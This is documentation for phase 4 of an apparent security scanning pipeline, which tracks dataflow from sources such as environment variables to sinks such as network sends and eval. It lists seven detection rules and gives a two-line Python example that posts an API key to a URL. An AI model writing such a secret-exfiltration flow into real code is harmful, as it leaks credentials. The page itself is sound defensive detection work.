Pipeline · Phase 4

Behavioural Analysis — source → sink dataflow.

Phase 4 parses the file (Babel AST for JS/TS, regex extractors for the rest) and tracks how data flows from sources (env vars, file reads, network responses) to sinks (network sends, command exec, eval). Catches what regex misses — like a secret read in one statement that's exfiltrated in another.

Property	Value
Latency	<200ms
Scope	Write / Edit · 6 languages
Engine	BehaviouralAnalyser · 7 dataflow rules
Score weight	`scoring_weights.behavioural` — default 2.0 (heaviest)
Short-circuit	any CRITICAL finding → deny immediately

Languages

Language	Parser	Extensions
JavaScript / TypeScript	Babel AST	.js .ts .jsx .tsx .mjs .cjs
Python	Regex	.py .pyw
Shell	Regex	.sh .bash .zsh .fish .ksh
Ruby	Regex	.rb .rake .gemspec
PHP	Regex	.php .phtml
Go	Regex	.go

The 7 dataflow rules

Rule	Severity	Detection
`DATAFLOW_EXFIL`	CRIT	Secret or credential flows to a network sink
`DATAFLOW_RCE`	CRIT	Network response flows to `eval` / `exec`
`DATAFLOW_CMD_INJECT`	HIGH	User input flows to a command execution sink
`DATAFLOW_EVAL`	HIGH	Data flows to `eval` / `Function` constructor
`CAPABILITY_C2`	HIGH	Skill/file has both exec + network capabilities
`CAPABILITY_EVAL`	HIGH	Skill/file uses dynamic code evaluation
`CROSS_FILE_FLOW`	MED	Data crosses file boundaries

Why it's the heaviest weight

Dataflow tracking has very low false-positive rates compared to regex — a match means there's actually a path from a sensitive source to a dangerous sink in the parsed AST. That's why scoring_weights.behavioural defaults to 2.0 (vs 1.0 for runtime/static/llm). Turn it down only if you trust your code reviewers more than the analyser.

Example

# leak.py
key = os.environ["API_KEY"]              # source
requests.post(url, data=key)             # sink

DATAFLOW_EXFIL · 0.88

← Prev Phase 3 — Static

Next → Phase 5 — LLM